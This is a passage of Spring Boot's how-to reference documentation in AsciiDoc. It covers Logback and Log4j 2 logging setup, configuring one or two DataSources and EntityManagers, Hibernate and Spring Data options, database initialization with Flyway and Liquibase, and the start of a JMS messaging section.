* `$\{LOG_PATH}`: The value of `logging.path` (representing a directory for
 log files to live in), if it was set in Boot's external configuration.
* `$\{LOG_EXCEPTION_CONVERSION_WORD}`: The value of `logging.exception-conversion-word`,
 if it was set in Boot's external configuration.

Spring Boot also provides some nice ANSI color terminal output on a console (but not in
a log file) by using a custom Logback converter. See the default `base.xml` configuration
for details.

If Groovy is on the classpath, you should be able to configure Logback with
`logback.groovy` as well. If present, it takes precedence.



[[howto-configure-logback-for-logging-fileonly]]
==== Configure Logback for File-only Output
If you want to disable console logging and write output only to a file, you need a custom
`logback-spring.xml` that imports `file-appender.xml` but not `console-appender.xml`, as
shown in the following example:

[source,xml,indent=0,subs="verbatim,quotes,attributes"]
----
	<?xml version="1.0" encoding="UTF-8"?>
	<configuration>
		<include resource="org/springframework/boot/logging/logback/defaults.xml" />
		<property name="LOG_FILE" value="${LOG_FILE:-${LOG_PATH:-${LOG_TEMP:-${java.io.tmpdir:-/tmp}}/}spring.log}"/>
		<include resource="org/springframework/boot/logging/logback/file-appender.xml" />
		<root level="INFO">
			<appender-ref ref="FILE" />
		</root>
	</configuration>
----

You also need to add `logging.file` to your `application.properties`, as shown in the
following example:

[source,properties,indent=0,subs="verbatim,quotes,attributes"]
----
	logging.file=myapplication.log
----



[[howto-configure-log4j-for-logging]]
=== Configure Log4j for Logging
Spring Boot supports https://logging.apache.org/log4j/2.x[Log4j 2] for logging
configuration if it is on the classpath. If you use the starters for
assembling dependencies, you have to exclude Logback and then include Log4j 2
instead. If you do not use the starters, you need to provide (at least) `spring-jcl` in
addition to Log4j 2.

The simplest path is probably through the starters, even though it requires some
jiggling with excludes.
The following example shows how to set up the starters in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-logging<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-log4j2<\/artifactId>\n\t<\/dependency>\n----\n\nAnd the following example shows one way to set up the starters in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\tcompile 'org.springframework.boot:spring-boot-starter-web'\n\t\tcompile 'org.springframework.boot:spring-boot-starter-log4j2'\n\t}\n\n\tconfigurations {\n\t\tall {\n\t\t\texclude group: 'org.springframework.boot', module: 'spring-boot-starter-logging'\n\t\t}\n\t}\n----\n\nNOTE: The Log4j starters gather together the dependencies for common logging\nrequirements (such as having Tomcat use `java.util.logging` but configuring the\noutput using Log4j 2). See the\n{github-code}\/spring-boot-samples\/spring-boot-sample-actuator-log4j2[Actuator Log4j 2]\nsamples for more detail and to see it in action.\n\nNOTE: To ensure that debug logging performed using `java.util.logging` is routed into\nLog4j 2, configure its https:\/\/logging.apache.org\/log4j\/2.0\/log4j-jul\/index.html[JDK\nlogging adapter] by setting the `java.util.logging.manager` system property to\n`org.apache.logging.log4j.jul.LogManager`.\n\n\n\n[[howto-configure-log4j-for-logging-yaml-or-json-config]]\n==== Use YAML or JSON to Configure Log4j 2\nIn addition to its default XML configuration format, Log4j 2 also supports YAML and JSON\nconfiguration files. To configure Log4j 2 to use an alternative configuration file format,\nadd the appropriate dependencies to the classpath and name your\nconfiguration files to match your chosen file format, as shown in the following example:\n\n[cols=\"10,75,15\"]\n|===\n|Format|Dependencies|File names\n\n|YAML\na| `com.fasterxml.jackson.core:jackson-databind` +\n `com.fasterxml.jackson.dataformat:jackson-dataformat-yaml`\na| `log4j2.yaml` +\n `log4j2.yml`\n\n|JSON\na| `com.fasterxml.jackson.core:jackson-databind`\na| `log4j2.json` +\n `log4j2.jsn`\n|===\n\n[[howto-data-access]]\n== Data Access\n\nSpring Boot includes a number of starters for working with data sources. This section\nanswers questions related to doing so.\n\n[[howto-configure-a-datasource]]\n=== Configure a Custom DataSource\nTo configure your own `DataSource`, define a `@Bean` of that type in your configuration.\nSpring Boot reuses your `DataSource` anywhere one is required, including database\ninitialization. 
If you need to externalize some settings, you can bind your
`DataSource` to the environment (see
"`<<spring-boot-features.adoc#boot-features-external-config-3rd-party-configuration>>`").

The following example shows how to define a data source in a bean:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Bean
	@ConfigurationProperties(prefix="app.datasource")
	public DataSource dataSource() {
		return new FancyDataSource();
	}
----

The following example shows how to define a data source by setting properties:

[source,properties,indent=0]
----
	app.datasource.url=jdbc:h2:mem:mydb
	app.datasource.username=sa
	app.datasource.pool-size=30
----

Assuming that your `FancyDataSource` has regular JavaBean properties for the URL, the
username, and the pool size, these settings are bound automatically before the
`DataSource` is made available to other components. The regular
<<howto-initialize-a-database-using-spring-jdbc,database initialization>> also happens
(so the relevant sub-set of `spring.datasource.*` can still be used with your custom
configuration).

Spring Boot also provides a utility builder class, called `DataSourceBuilder`, that can
be used to create one of the standard data sources (if it is on the classpath). The
builder can detect the one to use based on what's available on the classpath. It also
auto-detects the driver based on the JDBC URL.

The following example shows how to create a data source by using a `DataSourceBuilder`:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
include::{code-examples}/jdbc/BasicDataSourceExample.java[tag=configuration]
----

To run an app with that `DataSource`, all you need is the connection
information. Pool-specific settings can also be provided. Check the implementation that
is going to be used at runtime for more details.

The following example shows how to define a JDBC data source by setting properties:

[source,properties,indent=0]
----
	app.datasource.url=jdbc:mysql://localhost/test
	app.datasource.username=dbuser
	app.datasource.password=dbpass
	app.datasource.pool-size=30
----

However, there is a catch. Because the actual type of the connection pool is not exposed,
no keys are generated in the metadata for your custom `DataSource` and no completion is
available in your IDE (because the `DataSource` interface exposes no properties). Also, if
you happen to have Hikari on the classpath, this basic setup does not work, because Hikari
has no `url` property (but does have a `jdbcUrl` property). In that case, you must rewrite
your configuration as follows:

[source,properties,indent=0]
----
	app.datasource.jdbc-url=jdbc:mysql://localhost/test
	app.datasource.username=dbuser
	app.datasource.password=dbpass
	app.datasource.maximum-pool-size=30
----

You can fix that by forcing the connection pool to use and return a dedicated
implementation rather than `DataSource`. You cannot change the implementation
at runtime, but the list of options will be explicit.

The following example shows how to create a `HikariDataSource` with `DataSourceBuilder`:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
include::{code-examples}/jdbc/SimpleDataSourceExample.java[tag=configuration]
----

You can even go further by leveraging what `DataSourceProperties` does for you -- that is,
by providing a default embedded database with a sensible username and password if no URL
is provided.
You can easily initialize a `DataSourceBuilder` from the state of any
`DataSourceProperties` object, so you could also inject the `DataSource` that Spring Boot
creates automatically. However, that would split your configuration into two namespaces:
`url`, `username`, `password`, `type`, and `driver` on `spring.datasource` and the rest on
your custom namespace (`app.datasource`). To avoid that, you can redefine a custom
`DataSourceProperties` on your custom namespace, as shown in the following example:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
include::{code-examples}/jdbc/ConfigurableDataSourceExample.java[tag=configuration]
----

This setup puts you _in sync_ with what Spring Boot does for you by default, except that
a dedicated connection pool is chosen (in code) and its settings are exposed in the
`app.datasource.configuration` sub namespace. Because `DataSourceProperties` is taking
care of the `url`/`jdbcUrl` translation for you, you can configure it as follows:

[source,properties,indent=0]
----
	app.datasource.url=jdbc:mysql://localhost/test
	app.datasource.username=dbuser
	app.datasource.password=dbpass
	app.datasource.configuration.maximum-pool-size=30
----

TIP: Spring Boot exposes Hikari-specific settings under `spring.datasource.hikari`. This
example uses a more generic `configuration` sub namespace, because it does not support
multiple datasource implementations.

NOTE: Because your custom configuration chooses to go with Hikari, `app.datasource.type`
has no effect. In practice, the builder is initialized with whatever value you
might set there and is then overridden by the call to `.type()`.

See "`<<spring-boot-features.adoc#boot-features-configure-datasource>>`" in the
"`Spring Boot features`" section and the
{sc-spring-boot-autoconfigure}/jdbc/DataSourceAutoConfiguration.{sc-ext}[`DataSourceAutoConfiguration`]
class for more details.



[[howto-two-datasources]]
=== Configure Two DataSources
If you need to configure multiple data sources, you can apply the same tricks that are
described in the previous section. You must, however, mark one of the `DataSource`
instances as `@Primary`, because various auto-configurations down the road expect to be
able to get one by type.

If you create your own `DataSource`, the auto-configuration backs off. In the following
example, we provide the _exact_ same feature set as the auto-configuration provides
on the primary data source:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
include::{code-examples}/jdbc/SimpleTwoDataSourcesExample.java[tag=configuration]
----

TIP: `firstDataSourceProperties` has to be flagged as `@Primary` so that the database
initializer feature uses your copy (if you use the initializer).

Both data sources are also bound for advanced customizations.
For instance, you could\nconfigure them as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.first.url=jdbc:mysql:\/\/localhost\/first\n\tapp.datasource.first.username=dbuser\n\tapp.datasource.first.password=dbpass\n\tapp.datasource.first.configuration.maximum-pool-size=30\n\n\tapp.datasource.second.url=jdbc:mysql:\/\/localhost\/second\n\tapp.datasource.second.username=dbuser\n\tapp.datasource.second.password=dbpass\n\tapp.datasource.second.max-total=30\n----\n\nYou can apply the same concept to the secondary `DataSource` as well, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/CompleteTwoDataSourcesExample.java[tag=configuration]\n----\n\nThe preceding example configures two data sources on custom namespaces with the same\nlogic as Spring Boot would use in auto-configuration. Note that each `configuration` sub\nnamespace provides advanced settings based on the chosen implementation.\n\n\n\n[[howto-use-spring-data-repositories]]\n=== Use Spring Data Repositories\nSpring Data can create implementations of `@Repository` interfaces of various flavors.\nSpring Boot handles all of that for you, as long as those `@Repositories` are included in\nthe same package (or a sub-package) of your `@EnableAutoConfiguration` class.\n\nFor many applications, all you need is to put the right Spring Data dependencies on\nyour classpath (there is a `spring-boot-starter-data-jpa` for JPA and a\n`spring-boot-starter-data-mongodb` for Mongodb) and create some repository interfaces to\nhandle your `@Entity` objects. Examples are in the\n{github-code}\/spring-boot-samples\/spring-boot-sample-data-jpa[JPA sample] and the\n{github-code}\/spring-boot-samples\/spring-boot-sample-data-mongodb[Mongodb sample].\n\nSpring Boot tries to guess the location of your `@Repository` definitions, based on the\n`@EnableAutoConfiguration` it finds. To get more control, use the `@EnableJpaRepositories`\nannotation (from Spring Data JPA).\n\nFor more about Spring Data, see the {spring-data}[Spring Data project page].\n\n\n\n[[howto-separate-entity-definitions-from-spring-configuration]]\n=== Separate @Entity Definitions from Spring Configuration\nSpring Boot tries to guess the location of your `@Entity` definitions, based on the\n`@EnableAutoConfiguration` it finds. To get more control, you can use the `@EntityScan`\nannotation, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\t@EnableAutoConfiguration\n\t@EntityScan(basePackageClasses=City.class)\n\tpublic class Application {\n\n\t\t\/\/...\n\n\t}\n----\n\n\n\n[[howto-configure-jpa-properties]]\n=== Configure JPA Properties\nSpring Data JPA already provides some vendor-independent configuration options (such as\nthose for SQL logging), and Spring Boot exposes those options and a few more for Hibernate\nas external configuration properties. Some of them are automatically detected according to\nthe context so you should not have to set them.\n\nThe `spring.jpa.hibernate.ddl-auto` is a special case, because, depending on runtime\nconditions, it has different defaults. If an embedded database is used and no schema\nmanager (such as Liquibase or Flyway) is handling the `DataSource`, it defaults to\n`create-drop`. 
In all other cases, it defaults to `none`.

The dialect to use is also automatically detected based on the current `DataSource`, but
you can set `spring.jpa.database` yourself if you want to be explicit and bypass that
check on startup.

NOTE: Specifying a `database` leads to the configuration of a well-defined Hibernate
dialect. Several databases have more than one `Dialect`, and this may not suit your needs.
In that case, you can either set `spring.jpa.database` to `default` to let Hibernate
figure things out or set the dialect by setting the `spring.jpa.database-platform`
property.

The most common options to set are shown in the following example:

[indent=0,subs="verbatim,quotes,attributes"]
----
	spring.jpa.hibernate.naming.physical-strategy=com.example.MyPhysicalNamingStrategy
	spring.jpa.show-sql=true
----

In addition, all properties in `+spring.jpa.properties.*+` are passed through as normal
JPA properties (with the prefix stripped) when the local `EntityManagerFactory` is
created.

TIP: If you need to apply advanced customization to Hibernate properties, consider
registering a `HibernatePropertiesCustomizer` bean that will be invoked prior to creating
the `EntityManagerFactory`. This takes precedence over anything that is applied by the
auto-configuration.



[[howto-configure-hibernate-naming-strategy]]
=== Configure Hibernate Naming Strategy
Hibernate uses {hibernate-documentation}#naming[two different naming strategies] to map
names from the object model to the corresponding database names. The fully qualified
class name of the physical and the implicit strategy implementations can be configured by
setting the `spring.jpa.hibernate.naming.physical-strategy` and
`spring.jpa.hibernate.naming.implicit-strategy` properties, respectively. Alternatively,
if `ImplicitNamingStrategy` or `PhysicalNamingStrategy` beans are available in the
application context, Hibernate will be automatically configured to use them.

By default, Spring Boot configures the physical naming strategy with
`SpringPhysicalNamingStrategy`. This implementation provides the same table structure as
Hibernate 4: all dots are replaced by underscores and camel casing is replaced by
underscores as well. By default, all table names are generated in lower case, but it is
possible to override that flag if your schema requires it.

For example, a `TelephoneNumber` entity is mapped to the `telephone_number` table.

If you prefer to use Hibernate 5's default instead, set the following property:

[indent=0,subs="verbatim,quotes,attributes"]
----
	spring.jpa.hibernate.naming.physical-strategy=org.hibernate.boot.model.naming.PhysicalNamingStrategyStandardImpl
----

Alternatively, you can configure the following bean:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Bean
	public PhysicalNamingStrategy physicalNamingStrategy() {
		return new PhysicalNamingStrategyStandardImpl();
	}
----

See {sc-spring-boot-autoconfigure}/orm/jpa/HibernateJpaAutoConfiguration.{sc-ext}[`HibernateJpaAutoConfiguration`]
and {sc-spring-boot-autoconfigure}/orm/jpa/JpaBaseConfiguration.{sc-ext}[`JpaBaseConfiguration`]
for more details.



[[howto-configure-hibernate-second-level-caching]]
=== Configure Hibernate Second-Level Caching
Hibernate {hibernate-documentation}#caching[second-level cache] can be configured for a
range of cache providers.
Rather than configuring Hibernate to look up the cache provider
again, it is better to provide the one that is available in the context whenever possible.

If you are using JCache, this is pretty easy. First, make sure that
`org.hibernate:hibernate-jcache` is available on the classpath. Then, add a
`HibernatePropertiesCustomizer` bean, as shown in the following example:

[source,java,indent=0]
----
include::{code-examples}/jpa/HibernateSecondLevelCacheExample.java[tag=configuration]
----

This customizer will configure Hibernate to use the same `CacheManager` as the one that
the application uses. It is also possible to use separate `CacheManager` instances. For
details, refer to {hibernate-documentation}#caching-provider-jcache[the Hibernate user
guide].



[[howto-use-dependency-injection-hibernate-components]]
=== Use Dependency Injection in Hibernate Components
By default, Spring Boot registers a `BeanContainer` implementation that uses the
`BeanFactory` so that converters and entity listeners can use regular dependency
injection.

You can disable or tune this behaviour by registering a `HibernatePropertiesCustomizer`
that removes or changes the `hibernate.resource.beans.container` property.



[[howto-use-custom-entity-manager]]
=== Use a Custom EntityManagerFactory
To take full control of the configuration of the `EntityManagerFactory`, you need to add
a `@Bean` named '`entityManagerFactory`'. Spring Boot auto-configuration switches off its
entity manager in the presence of a bean of that type.



[[howto-use-two-entity-managers]]
=== Use Two EntityManagers
Even if the default `EntityManagerFactory` works fine, you need to define a new one,
because the presence of a second bean of that type switches off the
default. To make it easy to do, you can use the convenient `EntityManagerFactoryBuilder`
provided by Spring Boot. Alternatively, you can use the
`LocalContainerEntityManagerFactoryBean` directly from Spring ORM, as shown in the
following example:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	// add two data sources configured as above

	@Bean
	public LocalContainerEntityManagerFactoryBean customerEntityManagerFactory(
			EntityManagerFactoryBuilder builder) {
		return builder
				.dataSource(customerDataSource())
				.packages(Customer.class)
				.persistenceUnit("customers")
				.build();
	}

	@Bean
	public LocalContainerEntityManagerFactoryBean orderEntityManagerFactory(
			EntityManagerFactoryBuilder builder) {
		return builder
				.dataSource(orderDataSource())
				.packages(Order.class)
				.persistenceUnit("orders")
				.build();
	}
----

The configuration above almost works on its own. To complete the picture, you need to
configure `TransactionManagers` for the two `EntityManagers` as well. If you mark one of
them as `@Primary`, it could be picked up by the default `JpaTransactionManager` in Spring
Boot. The other would have to be explicitly injected into a new instance.
Alternatively,\nyou might be able to use a JTA transaction manager that spans both.\n\nIf you use Spring Data, you need to configure `@EnableJpaRepositories` accordingly,\nas shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\t@EnableJpaRepositories(basePackageClasses = Customer.class,\n\t\t\tentityManagerFactoryRef = \"customerEntityManagerFactory\")\n\tpublic class CustomerConfiguration {\n\t\t...\n\t}\n\n\t@Configuration\n\t@EnableJpaRepositories(basePackageClasses = Order.class,\n\t\t\tentityManagerFactoryRef = \"orderEntityManagerFactory\")\n\tpublic class OrderConfiguration {\n\t\t...\n\t}\n----\n\n\n\n[[howto-use-traditional-persistence-xml]]\n=== Use a Traditional `persistence.xml` File\nSpring Boot will not search for or use a `META-INF\/persistence.xml` by default. If you\nprefer to use a traditional `persistence.xml`, you need to define your own `@Bean` of\ntype `LocalEntityManagerFactoryBean` (with an ID of '`entityManagerFactory`') and set the\npersistence unit name there.\n\nSee\n{sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[`JpaBaseConfiguration`]\nfor the default settings.\n\n\n\n[[howto-use-spring-data-jpa--and-mongo-repositories]]\n=== Use Spring Data JPA and Mongo Repositories\n\nSpring Data JPA and Spring Data Mongo can both automatically create `Repository`\nimplementations for you. If they are both present on the classpath, you might have to do\nsome extra configuration to tell Spring Boot which repositories to create. The most\nexplicit way to do that is to use the standard Spring Data `+@EnableJpaRepositories+` and\n`+@EnableMongoRepositories+` annotations and provide the location of your `Repository`\ninterfaces.\n\nThere are also flags (`+spring.data.*.repositories.enabled+` and\n`+spring.data.*.repositories.type+`) that you can use to switch the auto-configured\nrepositories on and off in external configuration. Doing so is useful, for instance, in\ncase you want to switch off the Mongo repositories and still use the auto-configured\n`MongoTemplate`.\n\nThe same obstacle and the same features exist for other auto-configured Spring Data\nrepository types (Elasticsearch, Solr, and others). To work with them, change the names of\nthe annotations and flags accordingly.\n\n\n\n[[howto-use-customize-spring-datas-web-support]]\n=== Customize Spring Data's Web Support\nSpring Data provides web support that simplifies the use of Spring Data repositories in a\nweb application. Spring Boot provides properties in the `spring.data.web` namespace\nfor customizing its configuration. 
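
For example, assuming the `pageable` and `sort` property groups that back the web
support, a sketch such as the following changes the request parameter names and the
default page size:

[source,properties,indent=0]
----
	spring.data.web.pageable.default-page-size=50
	spring.data.web.pageable.page-parameter=p
	spring.data.web.sort.sort-parameter=orderBy
----
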
Note that if you are using Spring Data REST, you must\nuse the properties in the `spring.data.rest` namespace instead.\n\n\n[[howto-use-exposing-spring-data-repositories-rest-endpoint]]\n=== Expose Spring Data Repositories as REST Endpoint\nSpring Data REST can expose the `Repository` implementations as REST endpoints for you,\nprovided Spring MVC has been enabled for the application.\n\nSpring Boot exposes a set of useful properties (from the `spring.data.rest` namespace)\nthat customize the\n{spring-data-rest-javadoc}\/core\/config\/RepositoryRestConfiguration.{dc-ext}[`RepositoryRestConfiguration`].\nIf you need to provide additional customization, you should use a\n{spring-data-rest-javadoc}\/webmvc\/config\/RepositoryRestConfigurer.{dc-ext}[`RepositoryRestConfigurer`]\nbean.\n\nNOTE: If you do not specify any order on your custom `RepositoryRestConfigurer`, it runs\nafter the one Spring Boot uses internally. If you need to specify an order, make sure it\nis higher than 0.\n\n\n\n[[howto-configure-a-component-that-is-used-by-JPA]]\n=== Configure a Component that is Used by JPA\nIf you want to configure a component that JPA uses, then you need to ensure\nthat the component is initialized before JPA. When the component is auto-configured,\nSpring Boot takes care of this for you. For example, when Flyway is auto-configured,\nHibernate is configured to depend upon Flyway so that Flyway has a chance to\ninitialize the database before Hibernate tries to use it.\n\nIf you are configuring a component yourself, you can use an\n`EntityManagerFactoryDependsOnPostProcessor` subclass as a convenient way of setting up\nthe necessary dependencies. For example, if you use Hibernate Search with\nElasticsearch as its index manager, any `EntityManagerFactory` beans must be\nconfigured to depend on the `elasticsearchClient` bean, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/elasticsearch\/HibernateSearchElasticsearchExample.java[tag=configuration]\n----\n\n\n\n[[howto-configure-jOOQ-with-multiple-datasources]]\n=== Configure jOOQ with Two DataSources\nIf you need to use jOOQ with multiple data sources, you should create your own\n`DSLContext` for each one. Refer to\n{sc-spring-boot-autoconfigure}\/jooq\/JooqAutoConfiguration.{sc-ext}[JooqAutoConfiguration]\nfor more details.\n\nTIP: In particular, `JooqExceptionTranslator` and `SpringTransactionProvider` can be\nreused to provide similar features to what the auto-configuration does with a single\n`DataSource`.\n\n\n\n[[howto-database-initialization]]\n== Database Initialization\nAn SQL database can be initialized in different ways depending on what your stack is.\nOf course, you can also do it manually, provided the database is a separate process.\nIt is recommended to use a single mechanism for schema generation.\n\n\n\n[[howto-initialize-a-database-using-jpa]]\n=== Initialize a Database Using JPA\nJPA has features for DDL generation, and these can be set up to run on startup against the\ndatabase. This is controlled through two external properties:\n\n* `spring.jpa.generate-ddl` (boolean) switches the feature on and off and is vendor\nindependent.\n* `spring.jpa.hibernate.ddl-auto` (enum) is a Hibernate feature that controls the\nbehavior in a more fine-grained way. 
This feature is described in more detail later in this guide.



[[howto-initialize-a-database-using-hibernate]]
=== Initialize a Database Using Hibernate
You can set `spring.jpa.hibernate.ddl-auto` explicitly, and the standard Hibernate property
values are `none`, `validate`, `update`, `create`, and `create-drop`. Spring Boot chooses
a default value for you based on whether it thinks your database is embedded. It defaults
to `create-drop` if no schema manager has been detected or to `none` in all other cases. An
embedded database is detected by looking at the `Connection` type. `hsqldb`, `h2`, and
`derby` are embedded, and others are not. Be careful when switching from in-memory to a
'`real`' database that you do not make assumptions about the existence of the tables and
data in the new platform. You either have to set `ddl-auto` explicitly or use one of the
other mechanisms to initialize the database.

NOTE: You can log the schema creation by enabling the `org.hibernate.SQL` logger. This
is done for you automatically if you enable the
<<boot-features-logging-console-output,debug mode>>.

In addition, a file named `import.sql` in the root of the classpath is executed on
startup if Hibernate creates the schema from scratch (that is, if the `ddl-auto` property
is set to `create` or `create-drop`). This can be useful for demos and for testing if you
are careful, but it is probably not something you want to be on the classpath in production.
It is a Hibernate feature (and has nothing to do with Spring).


[[howto-initialize-a-database-using-spring-jdbc]]
=== Initialize a Database
Spring Boot can automatically create the schema (DDL scripts) of your `DataSource` and
initialize it (DML scripts). It loads SQL from the standard root classpath locations:
`schema.sql` and `data.sql`, respectively. In addition, Spring Boot processes the
`schema-$\{platform}.sql` and `data-$\{platform}.sql` files (if present), where `platform`
is the value of `spring.datasource.platform`. This allows you to switch to
database-specific scripts if necessary. For example, you might choose to set it to the
vendor name of the database (`hsqldb`, `h2`, `oracle`, `mysql`, `postgresql`, and so on).

[NOTE]
====
Spring Boot automatically creates the schema of an embedded `DataSource`. This behaviour
can be customized by using the `spring.datasource.initialization-mode` property. For
instance, if you want to always initialize the `DataSource` regardless of its type:

[indent=0,subs="verbatim,quotes,attributes"]
----
	spring.datasource.initialization-mode=always
----
====

By default, Spring Boot enables the fail-fast feature of the Spring JDBC initializer. This
means that, if the scripts cause exceptions, the application fails to start. You can tune
that behavior by setting `spring.datasource.continue-on-error`.

NOTE: In a JPA-based app, you can choose to let Hibernate create the schema or use
`schema.sql`, but you cannot do both. Make sure to disable
`spring.jpa.hibernate.ddl-auto` if you use `schema.sql`.



[[howto-initialize-a-spring-batch-database]]
=== Initialize a Spring Batch Database
If you use Spring Batch, it comes pre-packaged with SQL initialization scripts for most
popular database platforms. Spring Boot can detect your database type and execute those
scripts on startup. If you use an embedded database, this happens by default.
You can also
enable it for any database type, as shown in the following example:

[indent=0,subs="verbatim,quotes,attributes"]
----
	spring.batch.initialize-schema=always
----

You can also switch off the initialization explicitly by setting
`spring.batch.initialize-schema=never`.



[[howto-use-a-higher-level-database-migration-tool]]
=== Use a Higher-level Database Migration Tool
Spring Boot supports two higher-level migration tools: https://flywaydb.org/[Flyway]
and https://www.liquibase.org/[Liquibase].

[[howto-execute-flyway-database-migrations-on-startup]]
==== Execute Flyway Database Migrations on Startup
To automatically run Flyway database migrations on startup, add
`org.flywaydb:flyway-core` to your classpath.

The migrations are scripts in the form `V<VERSION>__<NAME>.sql` (with `<VERSION>` an
underscore-separated version, such as '`1`' or '`2_1`'). By default, they are in a folder
called `classpath:db/migration`, but you can modify that location by setting
`spring.flyway.locations`. This is a comma-separated list of one or more `classpath:`
or `filesystem:` locations. For example, the following configuration would search for
scripts in both the default classpath location and the `/opt/migration` directory:

[source,properties,indent=0]
----
	spring.flyway.locations=classpath:db/migration,filesystem:/opt/migration
----

You can also add a special `\{vendor}` placeholder to use vendor-specific scripts. Assume
the following:

[source,properties,indent=0]
----
	spring.flyway.locations=classpath:db/migration/\{vendor}
----

Rather than using `db/migration`, the preceding configuration sets the folder to use
according to the type of the database (such as `db/migration/mysql` for MySQL). The list
of supported databases is available in
{sc-spring-boot}/jdbc/DatabaseDriver.{sc-ext}[`DatabaseDriver`].

{sc-spring-boot-autoconfigure}/flyway/FlywayProperties.{sc-ext}[`FlywayProperties`]
provides most of Flyway's settings and a small set of additional properties that can be
used to disable the migrations or switch off the location checking. If you need more
control over the configuration, consider registering a `FlywayConfigurationCustomizer`
bean.

Spring Boot calls `Flyway.migrate()` to perform the database migration. If you would like
more control, provide a `@Bean` that implements
{sc-spring-boot-autoconfigure}/flyway/FlywayMigrationStrategy.{sc-ext}[`FlywayMigrationStrategy`].

Flyway supports SQL and Java https://flywaydb.org/documentation/callbacks.html[callbacks].
To use SQL-based callbacks, place the callback scripts in the `classpath:db/migration`
folder. To use Java-based callbacks, create one or more beans that implement
`Callback`. Any such beans are automatically registered with `Flyway`. They can be
ordered by using `@Order` or by implementing `Ordered`. Beans that implement the
deprecated `FlywayCallback` interface can also be detected, but they cannot be used
alongside `Callback` beans.

By default, Flyway autowires the (`@Primary`) `DataSource` in your context and
uses that for migrations. If you would like to use a different `DataSource`, you can create
one and mark its `@Bean` as `@FlywayDataSource`. If you do so and want two data sources,
remember to create another one and mark it as `@Primary`. Alternatively, you can use
Flyway's native `DataSource` by setting `spring.flyway.[url,user,password]`
in external properties.
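
The following sketch (the connection values are illustrative) shows what such a
configuration might look like:

[source,properties,indent=0]
----
	spring.flyway.url=jdbc:postgresql://localhost/migration
	spring.flyway.user=flyway
	spring.flyway.password=secret
----
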
Setting either `spring.flyway.url` or `spring.flyway.user`
is sufficient to cause Flyway to use its own `DataSource`. If any of the three
properties has not been set, the value of its equivalent `spring.datasource` property will
be used.

There is a {github-code}/spring-boot-samples/spring-boot-sample-flyway[Flyway sample] so
that you can see how to set things up.

You can also use Flyway to provide data for specific scenarios. For example, you can
place test-specific migrations in `src/test/resources`, and they are run only when your
application starts for testing. Also, you can use profile-specific configuration to
customize `spring.flyway.locations` so that certain migrations run only when a particular
profile is active. For example, in `application-dev.properties`, you might specify the
following setting:

[source,properties,indent=0]
----
	spring.flyway.locations=classpath:/db/migration,classpath:/dev/db/migration
----

With that setup, migrations in `dev/db/migration` run only when the `dev` profile is
active.



[[howto-execute-liquibase-database-migrations-on-startup]]
==== Execute Liquibase Database Migrations on Startup
To automatically run Liquibase database migrations on startup, add
`org.liquibase:liquibase-core` to your classpath.

By default, the master change log is read from `db/changelog/db.changelog-master.yaml`,
but you can change the location by setting `spring.liquibase.change-log`. In addition to
YAML, Liquibase also supports JSON, XML, and SQL change log formats.

By default, Liquibase autowires the (`@Primary`) `DataSource` in your context and uses
that for migrations. If you need to use a different `DataSource`, you can create one and
mark its `@Bean` as `@LiquibaseDataSource`. If you do so and you want two data sources,
remember to create another one and mark it as `@Primary`. Alternatively, you can use
Liquibase's native `DataSource` by setting `spring.liquibase.[url,user,password]` in
external properties. Setting either `spring.liquibase.url` or `spring.liquibase.user`
is sufficient to cause Liquibase to use its own `DataSource`. If any of the three
properties has not been set, the value of its equivalent `spring.datasource` property will
be used.

See
{sc-spring-boot-autoconfigure}/liquibase/LiquibaseProperties.{sc-ext}[`LiquibaseProperties`]
for details about available settings such as contexts, the default schema, and others.

There is a {github-code}/spring-boot-samples/spring-boot-sample-liquibase[Liquibase
sample] so that you can see how to set things up.



[[howto-messaging]]
== Messaging

Spring Boot offers a number of starters that include messaging. This section answers
questions that arise from using messaging with Spring Boot.

[[howto-jms-disable-transaction]]
=== Disable Transacted JMS Session
If your JMS broker does not support transacted sessions, you have to disable the
support of transactions altogether. If you create your own `JmsListenerContainerFactory`,
there is nothing to do, since, by default, it cannot be transacted.
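
A minimal sketch of such a factory (the bean method below is illustrative and applies
none of Boot's defaults) might look as follows:

[source,java,indent=0]
----
	@Bean
	public DefaultJmsListenerContainerFactory myFactory(
			ConnectionFactory connectionFactory) {
		// A factory created this way is not transacted unless you explicitly
		// set a transaction manager or enable sessionTransacted
		DefaultJmsListenerContainerFactory factory =
				new DefaultJmsListenerContainerFactory();
		factory.setConnectionFactory(connectionFactory);
		return factory;
	}
----
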
